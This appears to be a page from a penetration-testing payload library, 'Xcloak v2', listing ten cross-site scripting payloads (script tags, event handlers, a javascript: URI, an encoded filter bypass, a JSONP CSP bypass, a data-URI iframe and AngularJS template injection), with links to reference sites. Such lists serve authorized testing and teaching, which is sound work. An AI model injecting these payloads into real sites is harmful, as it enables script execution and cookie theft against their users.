Payload Library

Curated offensive payloads for authorized penetration testing

โŒ•
XSS PAYLOADS โ€” 10
Basic script tag
<script>alert('XSS')</script>
IMG onerror
<img src=x onerror=alert(1)>
SVG onload
<svg onload=alert(document.cookie)>
Details ontoggle
<details open ontoggle=alert(1)>
DOM-based (href)
javascript:alert(document.domain)
Filter bypass (encoded)
&#60;script&#62;alert(1)&#60;/script&#62;
CSP bypass via JSONP
<script src=https://cdn.jsdelivr.net/callback=alert></script>
โ„น Requires CSP allowing CDN
Data URI
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
Template literal
${alert(1)}
Angular ng-src
{{constructor.constructor('alert(1)')()}}
โ„น AngularJS 1.x SSTI
Resources
โ†— PayloadsAllTheThingsโ†— HackTricksโ†— PortSwigger Web Secโ†— OWASP Cheat Sheets
โš  INTEL
Xcloak v2 โ€” Real data from NVD and OTXUpload PoC exploits ยท Vote ยท Earn XPHit SYNC to fetch the latest CVEs